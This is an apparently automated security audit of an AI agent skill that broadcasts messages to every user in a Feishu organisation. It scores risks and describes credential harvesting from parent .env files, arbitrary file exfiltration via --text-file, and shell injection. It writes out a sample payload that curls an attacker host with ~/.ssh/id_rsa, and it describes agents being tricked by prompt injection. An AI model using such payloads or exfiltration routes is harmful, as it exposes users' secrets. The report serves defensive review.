Is autogame-17/feishu-broadcast safe?

https://github.com/openclaw/skills/tree/main/skills/autogame-17/feishu-broadcast

Overall score: 65 · CAUTION

The feishu-broadcast skill contains three compounding security issues that make it dangerous without review: (1) lib/api.js traverses up to four parent directories to find and load .env files, potentially harvesting workspace credentials; (2) index.js can read arbitrary files via --text-file and immediately broadcast their contents to all org users, creating a one-step exfiltration vector; and (3) shell command injection is possible via unsanitized template literal interpolation of user-controlled arguments into child_process.exec() calls. The skill's SKILL.md is clean with no prompt injection, and the install itself was well-behaved, but the runtime code surface poses genuine credential-harvesting and command-injection risks that would be triggered when an AI agent executes the skill.

Category Scores

Prompt Injection 90/100 · 30%
Data Exfiltration 28/100 · 25%
Code Execution 45/100 · 20%
Clone Behavior 90/100 · 10%
Canary Integrity 100/100 · 10%
Behavioral Reasoning 40/100 · 5%

Findings (7)

HIGH Multi-level parent directory .env traversal -35

lib/api.js constructs an array of possibleEnvPaths that includes path.resolve(__dirname, '../../../.env') and path.resolve(__dirname, '../../../../.env'). When installed at a typical location such as ~/agent/skills/feishu-broadcast/lib/, these paths resolve to ~/agent/skills/.env and ~/agent/.env respectively — well outside the skill's own directory. This code will silently load and consume credentials from parent workspace directories, including any Anthropic API keys, database URLs, or cloud provider tokens stored there.

HIGH Arbitrary file read broadcast to all org users -30

index.js accepts a --text-file argument and reads the file with fs.readFileSync, then passes the entire contents as the message body for a broadcast to every user in the Feishu tenant. An AI agent instructed (or tricked via prompt injection from another source) to 'send a report' using a sensitive file path (e.g., --text-file ~/.ssh/id_rsa) would exfiltrate that file's contents to all employees, providing both exfiltration and social engineering in one action.

HIGH Shell command injection via unsanitized exec() template literals -35

index.js constructs shell commands using ES6 template literals with argv.title and argv.image inserted without escaping or sanitization. An agent that passes a crafted title containing shell metacharacters (e.g., a title ending with "; curl attacker.com/exfil -d @~/.ssh/id_rsa; echo ") would cause arbitrary command execution on the host running the agent. The argv.image parameter has the same vulnerability in the feishu-sticker command.

MEDIUM Mass-broadcast primitive amplifies impact of any misuse -30

Unlike skills that message specific users, this skill fetches ALL users from the Feishu directory and sends to each one. Any error in agent judgment, whether from prompt injection, misunderstood intent, or shell injection, is immediately org-wide in effect. There is a --dry-run flag but no confirmation step, the only rate limiting is a 1s delay between sends (not a true safety gate), and there is no scoping to specific channels or groups.

MEDIUM Transitive trust dependency on two unaudited skills -20

The skill delegates message sending to feishu-post/send.js and feishu-sticker/send.js via shell exec(). If either of those skills is compromised or malicious, it executes under the same process context with full access to all environment variables loaded by this skill (including the credentials harvested by the .env traversal). The security of this skill is thus partially delegated to two external skills.

LOW Undocumented broadcast scope in SKILL.md -10

SKILL.md does not clearly communicate to users or agents that this skill sends to ALL users in the tenant, not a targeted subset. An agent reasoning about 'sending an announcement' may not realize the full org-wide blast radius, increasing the likelihood of accidental mass messaging.

INFO Clean install with expected network connections only 0

The installation process made only expected connections to GitHub (140.82.121.4) and Ubuntu infrastructure. No connections to attacker-controlled servers, no unexpected process spawning, and filesystem changes were limited to the target skill directory.